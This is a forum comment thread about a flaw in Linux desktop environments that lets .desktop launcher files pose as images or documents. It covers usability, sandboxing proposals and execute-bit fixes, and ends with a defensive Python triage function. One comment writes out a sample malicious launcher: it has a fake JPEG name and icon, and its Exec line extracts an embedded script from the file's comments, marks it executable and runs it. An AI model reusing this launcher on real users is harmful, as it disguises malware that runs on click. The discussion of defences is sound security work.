    And you have a strange definition of "stupidity" which goes something like this: "Not paranoid enough about the interface because it is possible for attachments to deceive the user as to their nature." The interface is broken, that's all there is to it. But it doesn't surprise me that your average GNU/Linux user doesn't think that a broken interface is a problem; obviously we're dealing with the stupid user again who hasn't learned the proper degree of paranoia about what the interface depicts to the user.

    PS: Just so you know, I'm a huge free software supporter. The great thing about open development is that bugs, when found, often get fixed, but this mentality falls short of the interface and real usability bugs. People, even advanced GNU/Linux gurus, succumb to usability pitfalls, when you're tired or in a hurry or intoxicated or who knows what. I'm not saying we should prevent the user from doing anything harmful to his system (a common strawman on this forum). But it should be obvious to everyone except for this site that if the icon shows that it's a picture file or a spreadsheet or whatever else, that that is what the interface should be. The RIGHT behavior is that the icon representation must reflect truly what is being represented.

  25. Re:Linux Users Don't Backup?!? by Knuckles · · Score: 2, Informative

    True. Though just as the first case can be prevented by mounting /home (or possibly /home/) noexec, this one can be prevented by doing the same with /tmp

    --
    "When I first heard Daydream Nation it quite frankly scared the living shit out of me." -- Matthew Stearns
  26. Not PEBKAC by TheLink · · Score: 4, Interesting

    A lot of people claim it's a PEBKAC problem, but I STRONGLY disagree.

    If you expect people to figure out whether a file is safe before "launching/opening" it, then you are expecting people to solve something arguably harder than the "halting problem" (which I hear is very hard, but still easier in comparison since you are given both the description of the program AND the finite input!).

    I propose that:
    1) Compliant programs be allowed to _request_ what they want to be able to do (by either using a finite and manageable set of standard sandbox templates, or in special cases a custom sandbox template - which can be audited and digitally signed by 3rd parties).
    AND THEN
    2a) The user be asked whether the request seems reasonable e.g. Fun Screensaver requests "Standard Screen Saver" privileges vs WARNING!! Fun Screensaver is requesting "Full System" privileges!
    AND THEN
    3) If approved, the operating system then enforces the requested template, so the program can only do whatever possible within the template sandbox.

    Do note there's also:
    2b) The request is silently approved if the OS has been told to remember the user's prior approval of the program and template (and the alt/whatever key was not held down while launching).
    2c) The request is silently approved if the program and requested template is signed by trusted parties (e.g. OS vendor), and the alt/whatever key was not held down while launching.

    I have proposed this concept before to Ubuntu and Suse, see:
    https://bugs.launchpad.net/ubuntu/+bug/156693
    (FWIW I've actually also suggested this to apple).

    It'll be hard to implement, but I suspect it's easier than getting "Joe Sixpack" to reliably solve something harder than the "halting problem".

    Lastly, much Windows malware REQUIRES a brain to participate in order to spread. It's often harder to write malware that does not require a brain to spread. Many here think they're so smart, but would they really know what a devious binary or perl script actually does? Have they ever looked at the Underhanded C entries?

    1. Re:Not PEBKAC by TheLink · · Score: 2, Insightful

      While Vista does sandboxing AFAIK it doesn't have templates for sandboxing (which to me are an important part for making them user manageable).

      Does it provide the user with an accurate concise idea of what the program's required privileges are?
      Does it allow the user to save the decision preferences for an app+template pair?

      Vista's UAC as implemented seems more like a way for Microsoft to shift blame to the user for security problems.

    2. Re:Not PEBKAC by Eskarel · · Score: 2, Insightful

      Actually it's not what Vista does. Vista says "application X is either requesting system access, or appears as if it might request system access do you want to grant it".

      It doesn't allow you to define which types of system access you want it to have (I might want my screensaver installer to be able to access the settings which allow it to set the screensaver I just installed as my default screensaver, but not to arbitrarily execute code or access other system settings for instance), nor does it allow you to provide long term approval for known applications.

      UAC is a massive improvement over the old system (it allows users to elevate permissions simply on demand), but it's got a whole bunch of flaws and isn't this system.

  27. They won't listen by diegocgteleline.es · · Score: 4, Informative

    I filed a bug warning of this security problem in March 2005. Final answer of the developers after taking it to the freedesktop lists: WONTFIX. So, what's the point of reporting bugs?...

    The fix is easy: only interpret .desktop files IFF they have the +x bit set (IOW, apply the regular UNIX semantics). It shouldn't take more than a few lines in Gnome and KDE to fix it, and distros can easily modify the scripts to make all the .desktop files +x.

    1. Re:They won't listen by Thinboy00 · · Score: 2, Funny

      Well... file a God-bug. That should fix it!

      --
      $ make available
    2. Re:They won't listen by Eskarel · · Score: 2, Insightful

      Well that's not actually a fix. If you're getting the file there by social engineering you can quite easily get the user to set permissions on the file to allow execution (you've already convinced them to download it, haven't you?).

      If you've found a vulnerability allowing you to put the file there without user intervention, then you can easily change the permissions at the same time.

    3. Re:They won't listen by Eli+Gottlieb · · Score: 2, Insightful

      The only solution to social engineering of the user is to have a more knowledgeable system administrator. This just ups the ante on the social engineering.

      No system can defeat social engineering.

  28. Re:Protect your self with encryption by JesseMcDonald · · Score: 2, Interesting

    The programs responsible for creating .desktop files would set the execute bit automatically, so the change should be more or less invisible. The only case where you'd have a non-executable .desktop file would be if it was saved from a program which does not normally create shortcuts: an e-mail attachment, something downloaded from a web site, etc.

    --
    "The state is that great fiction by which everyone tries to live at the expense of everyone else." - Bastiat
  29. Payload within .desktop by FxChiP · · Score: 2, Insightful
    Has anyone mentioned the possibility yet of embedding the payload (malicious script, etc.) within the .desktop file? The specification allows for commenting, after all, which is a free way to embed text -- the question then merely becomes one of extracting the text from the "comments" at the tail end of a .desktop file, outputting it to its own file, and executing.

    To wit, in a file called blah.desktop:

    [OMGMALICIOUS]
    Version=1.0
    Type=Application
    Name=HOT XXX JENNA JAMESON.jpg
    Icon=jpegicon.png
    Exec=bash -c "tail -n +7 blah.desktop | sed -E 's/^#(.*)$/\1/g' > malscript; chmod 777 malscript; ./malscript"
    ##!/bin/bash
    ##
    ## OMG MALICIOUS
    #
    #echo OMG HI PWNED J00 > pwned

    Which would then open the door to other types of scripts being embedded within the .desktop file, such as Python or Perl (the latter of which is probably the even more widespread of the two!)

    This method has a few benefits over the described one, including: offline execution of malware, no further download beyond the .desktop required; semi-easy modification of the embedded script (you can add or remove lines as you wish and even leave comments in thanks to the tail and sed commands used); and the embedded file could easily make the .desktop file it's contained in reach file size levels (something I, personally, look at with certain files) roughly equivalent to the file it's attempting to masquerade as. Theoretically, so long as you remembered to escape things properly, you could possibly even include binaries within the .desktop file in this manner(!!!!).

    This of course comes no closer to the holy grail that is root, but still an interesting twist on the same process...
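A defender's triage of a `.desktop` launcher, combining the execute-bit policy proposed earlier in the thread with checks for the masquerading name and comment-embedded script described in the comment above. This is an added example, not code from the thread or from GNOME/KDE; the function names, extension list and sample launcher are assumptions constructed for illustration.

```python
import os
import re
import stat

DOC_EXT = (".jpg", ".jpeg", ".png", ".gif", ".pdf", ".odt", ".txt", ".mp3")
INTERPRETERS = {"sh", "bash", "dash", "zsh", "perl", "python", "python3"}

# Constructed sample: harmless, but shaped like the launcher discussed above.
SAMPLE = """[Desktop Entry]
Version=1.0
Type=Application
Name=holiday photo.jpg
Icon=image-x-generic
Exec=sh -c "tail -n +7 photo.desktop"
##!/bin/sh
#echo constructed sample
"""


def parse_desktop(text):
    """Return ([Desktop Entry] key/value pairs, all comment lines)."""
    entries, comments, group = {}, [], None
    for line in text.splitlines():
        s = line.strip()
        if s.startswith("#"):
            comments.append(s)
        elif s.startswith("[") and s.endswith("]"):
            group = s[1:-1]
        elif "=" in s and group == "Desktop Entry":
            key, value = s.split("=", 1)
            entries[key.strip()] = value.strip()
    return entries, comments


def triage(text, filename, mode):
    """Return findings for one launcher; an empty list means nothing flagged."""
    entries, comments = parse_desktop(text)
    findings = []
    if not mode & stat.S_IXUSR:  # the +x policy proposed in the thread
        findings.append("not-executable: display contents, do not launch")
    name = entries.get("Name", "")
    if entries.get("Type") == "Application" and name.lower().endswith(DOC_EXT):
        findings.append("masquerade: Name %r looks like a document" % name)
    argv = entries.get("Exec", "").split()
    if argv and os.path.basename(argv[0]) in INTERPRETERS and ("-c" in argv or "-e" in argv):
        findings.append("interpreter: Exec passes inline code to " + argv[0])
    base = os.path.basename(filename)
    if base and base in entries.get("Exec", ""):
        findings.append("self-reference: Exec reads the launcher file itself")
    if any(re.match(r"#+!\s*/", c) for c in comments):
        findings.append("embedded-script: comment block contains a shebang line")
    return findings
```

For a file on disk, pass `os.stat(path).st_mode` as `mode`; a mail client or browser download handler could run the same checks before offering to open an attachment.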